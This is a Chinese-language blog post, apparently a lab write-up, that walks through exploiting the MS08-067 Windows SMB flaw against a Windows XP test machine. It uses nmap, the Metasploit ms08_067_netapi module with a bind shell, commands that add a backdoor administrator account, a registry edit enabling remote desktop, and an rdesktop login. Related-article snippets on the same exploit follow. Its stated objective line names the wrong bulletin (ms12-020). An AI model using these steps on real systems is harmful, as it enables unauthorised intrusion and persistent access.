远程命令执行——MS08-067漏洞利用

最新推荐文章于 2024-05-01 09:17:42 发布
最新推荐文章于 2024-05-01 09:17:42 发布
阅读量1.1k 收藏 25
点赞数 3
分类专栏: 漏洞学习 文章标签: windows 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wwwwyyyrre/article/details/130350972
版权

实验目的:

熟悉ms12-020漏洞的原理及利用方法

实验环境:

操作机:kali-linux-2022.4 IP:192.168.140.128

靶机:Windows XP Professio sp3 English IP:192.168.140.133

实验原理:

MS08-067漏洞是通过 MSRPC over SMB 通道调用 Server 服务程序中的 NetPathCanonicalize 函数时触发的,而 NetPathCanonicalize 函数在远程访问其他主机时,会调用 NetpwPathCanonicalize 函数,对远程访问的路径进行规范化,而在 NetpwPathCanonicalize 函数中存在的逻辑错误,造成栈缓冲区可被溢出,而获得远程代码执行(Remote Code Execution)。(CVE-2008-4250)

当用户在受影响的系统上收到RPC请求时,该漏洞会允许远程执行代码,攻击者可以在未经身份验证情况下利用此漏洞运行任意代码。同时,该漏洞可以用于蠕虫攻击。它影响了某些旧版本的Windows系统,包括:

  • Windows 2000
  • Windows XP
  • Windows Server 2003

 实验步骤:

  1. 利用nmap扫描

nmap -T4 -A -v 192.168.140.133 --script=vuln

扫描到了ms08-067漏洞 接下来进行利用

同时windows xp的445端口打开

  1. 打开msfconsole

  1. 搜索ms08-067 search ms08-067 有一个利用模块

(4)进入模块 use exploit/windows/smb/ms08_067_netapi或use 0

输入options

发现RHOSTS可知是一个网段 IP地址是靶机

(5)配置options

set rhosts 192.168.140.133

因为在配置里,攻击机以及攻击端口都有所以不需要重新配置

(6)show payloads

(7)set payload generic/shell_bind_tcp

Show options

(8)配置完毕 run/exploit 执行攻击

(9) 在Windows上创建一个名称为admin密码为pass的用户,并提升为管理员权限  net user admin pass /add && net localgroup administrators admin /add

(10) 开启windows远程登录端口

echo reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f > C:\WINDOWS\system32\3389.bat && call 3389.bat

(11)检查3389端口是否打开

(12)3389端口已打开 重新打开一个终端 进行远程登录

rdesktop 192.168.140.133:3389

输入刚才创建的用户 admin    pass

成功远程登录

漏洞利用成功

呕...
关注
  • 3
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
操作系统漏洞验证及加固-MS08_067漏洞利用与安全加固
旺仔Sec&blog
11-17 1124
第四步,根据扫描得到的结果靶机的操作系统为WindowsServer2003 SP1 or SP2,通过脚本检测到该操作系统包含命令执行漏洞漏洞编号为MS08-067,下面我们来通过渗透机中的利用模块来对该漏洞进行利用,通过命令msfconsole来启动metasploit漏洞渗透平台。第三步,使用命令nmap -O -n -T4 -p445 --script smb-vuln-ms08-067目标靶机ip 扫描靶机操作系统,同时确认目标靶机是否存在smb漏洞。密码:123456)
Windows XP SP2(MS08-067漏洞复现及利用)
sGanYu
09-03 5216
打开kali,开启msf所依赖的数据库 启动msfconsole 搜寻关于ms08-067有关的漏洞 使用 输入show options显示ms08-067模块所需的参数 配置参数,设置目标操作系统类型为4
网络安全kali web安全 Kali之msf简单的漏洞利用
热门推荐
xueshenlaila的博客
03-08 1万+
信息收集 靶机的IP地址为:192.168.173.136 利用nmap工具扫描其开放端口、系统等 整理一下目标系统的相关信息 系统版本:Windows server 2003 开放的端口及服务: 21/tcp ftp 135/tcp msrpc 139/tcp netbios-ssn 445/tcp microsoft-ds 777/tcp multiling-http 1025/tcp NFS-or-IIS 1026/tcp LSA-or-nterm 1029/tcp ms
2024年最新MS08-067 漏洞利用与安全加固
最新发布
2401_84302796的博客
05-01 478
攻击者利用受害者主机默认开发的SMB服务的端口445 发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成可被利用并可远程执行代码。MS08_067 漏洞的全程为 “WIndows Server 服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的RPC请求。则该漏洞可能允许远程执行代码。Ms08_067_netapi 是Metasploit 中的一款溢出攻击载荷。
MS08-067 漏洞利用与安全加固,高级网络安全程序员必会
2301_76190858的博客
04-03 1370
攻击者利用受害者主机默认开发的SMB服务的端口445 发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成可被利用并可远程执行代码。MS08_067 漏洞的全程为 “WIndows Server 服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的RPC请求。则该漏洞可能允许远程执行代码。Ms08_067_netapi 是Metasploit 中的一款溢出攻击载荷。
(菜鸟自学)Metasploit漏洞利用——ms08-067
nbdlsplyb的博客
01-20 1551
MS08-067 是指微软于2008年发布的一个安全漏洞(CVE-2008-4250)。该漏洞影响了 Windows 操作系统中的 Server Service,可被远程攻击者利用执行任意代码,从而完全控制受影响的系统。这个漏洞主要影响 Windows 2000、Windows XP 和 Windows Server 2003 等早期版本的操作系统。攻击者可以通过发送特制的网络请求,利用漏洞执行恶意代码,从而取得对受感染计算机的完全控制权。
MS08-067漏洞分析与复现
qq_43443410的博客
07-30 2481
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据.
MS08_067漏洞详解
m0_64593235的博客
04-17 971
MS08_067漏洞详解
ms12-020压缩包
04-03
3月19日消息,Windows服务器近日被爆存在高危远程代码执行漏洞——MS12-020,微软公司把该漏洞级别定为最高级-严重(Critical),攻击者可以通过向远程桌面端口(端口号3389)发送特定的数据包获得管理员权限
利用 Fastjson 注入 Spring 内存马,太秀了~!(csdn)————程序.pdf
12-04
例如,利用 JNDI (Java Naming and Directory Interface) 来加载远程资源,攻击者可以指定恶意的 dataSourceName,使得应用在反序列化过程中连接到攻击者控制的 LDAP 服务器,下载并执行恶意代码。 以下是一个简单...
windows实用dos命令大全
12-10
一)MD——建立子目录 1.功能:创建新的子目录  2.类型:内部命令  3.格式:MD[盘符:][路径名]〈子目录名〉  4.使用说明:  (1)“盘符”:指定要建立子目录的磁盘驱动器字母,若省略,则为当前驱动器;...
永恒之蓝漏洞修复工具
06-30
"永恒之蓝"是2017年全球范围内爆发的一次大规模网络安全事件,其主要利用了微软Windows系统中的一个严重漏洞——MS17-010。这个漏洞是由名为"影子经纪人"的黑客组织泄露的NSA(美国国家安全局)网络武器库中的攻击...
工控安全职业证书技能实践:工控已知漏洞验证与实战.pptx
07-12
通过搜索和选择相应的漏洞模块,如ms08-067,我们能够模拟攻击行为并观察结果。实际攻击成功后,通常会有明显的迹象表明漏洞已被成功利用。 总之,工控安全涉及多个层面,从理解漏洞的性质到实施有效的防御策略,再...
MS08-067 漏洞利用与安全加固
theRavensea
03-15 2124
攻击者利用受害者主机默认开发的SMB服务的端口445 发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成可被利用并可远程执行代码。MS08_067 漏洞的全程为 “WIndows Server 服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的RPC请求。则该漏洞可能允许远程执行代码。 Ms08_067_netapi 是Metasploit 中的一款溢出攻击载荷。NetPathCanonicalize 函数在远程访问其他主机时会调用 NetpwCanoni
远程代码/命令执行漏洞学习(一)
love_wgll的博客
02-23 599
远程代码/命令执行漏洞
Windows漏洞MS08-067
Nanyeer的博客
03-21 1608
MS08-067漏洞(远程命令执行漏洞)的演示
MS08-067 (CVE-2008-4250) 远程命令执行漏洞
qq_46487664的博客
03-28 729
MS08-067漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成栈缓冲区内存错误,从而被利用实施远程代码执行。添加图片注释,不超过 140 字(可选)添加图片注释,不超过 140 字(可选)添加图片注释,不超过 140 字(可选)添加图片注释,不超过 140 字(可选)添加图片注释,不超过 140 字(可选)
Metasploit MS08-067 漏洞利用演示
qq_36991248的博客
12-31 2678
Metasploit MS08-067 漏洞利用演示 MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。此漏洞可用于进行蠕虫攻击,目前已经有利用漏洞的蠕虫病毒。 原理解析: 攻击者利用windows操作系统默认开放的SMB服务445端口发送恶意代码到目标主机,通过MSRPC接口调用Server服务的一个函数,溢出栈缓冲区,获得远程代码执行权限,从而完全控制主机Win..
ms08-067漏洞利用
07-28
ms08-067是一种远程代码执行漏洞,影响微软Windows操作系统的SMBv1协议。通过利用漏洞,攻击者可以在目标系统上执行恶意代码,获取系统权限,并对系统进行操控。 要利用ms08-067漏洞,攻击者需要使用相应的漏洞利用工具。这些工具通常会尝试发送特定的恶意数据包到目标系统的SMB服务,以触发漏洞执行攻击者的代码。 然而,我必须强调,在任何情况下,利用漏洞来攻击他人或未经授权访问系统都是违法行为,并且是道德和法律所不允许的。我不能提供任何有关利用ms08-067漏洞的详细信息或支持。如果您对网络安全和漏洞研究感兴趣,请遵循合法和道德的路径,例如学习和研究网络安全领域的知识,并通过合法途径提供安全建议和支持。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值